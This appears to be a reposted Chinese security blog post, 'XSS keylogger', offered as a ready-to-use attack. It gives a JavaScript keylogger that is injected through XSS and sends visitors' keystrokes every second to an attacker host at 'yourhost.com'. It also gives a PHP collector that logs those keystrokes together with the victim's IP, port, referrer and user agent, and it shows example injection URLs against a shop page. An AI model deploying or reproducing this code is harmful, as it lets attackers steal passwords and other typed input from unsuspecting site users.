这种方法是非常公开的,但很多人仍然不知道它。
cookie时,从目标不能重复使用,您可以使用此方法。 你需要一台主机上传:
g.php
<?php
$Keylog = $_GET["c"];
$reffer = $_SERVER['HTTP_REFERER'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date ("l dS of F Y h:i:s A");
$port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$file = fopen('data.txt', 'a');
fwrite($file, 'Ip: '.$ip."n");
fwrite($file, 'Port: '.$port."n");
fwrite($file, 'Refferer: '.$reffer."n");
fwrite($file, 'User Agent: '.$user_agent."n");
fwrite($file, 'Date: '.$date."n");
fwrite($file, $Keylog."n");
fwrite($file, "---------------------------nn");
fclose($fi);
?>
k.js:
var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://yourhost.com/g.php?c='+keys;
keys = '';
}, 1000);
一个新的文件名 为data.txt的和chmod 777 data.txt中, 您可以使用它像这样:
http://www.91ri.org/shop.php?article=12
或者
http://www.91ri.org/shop.php?article=12
注:请自行去掉12后的空格
相关文章参考《js 实现键盘记录 兼容FireFox和IE》
本文来自国外安全论坛转自F1n9er博客由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。
转载请注明:jinglingshu的博客 » XSS的键盘记录
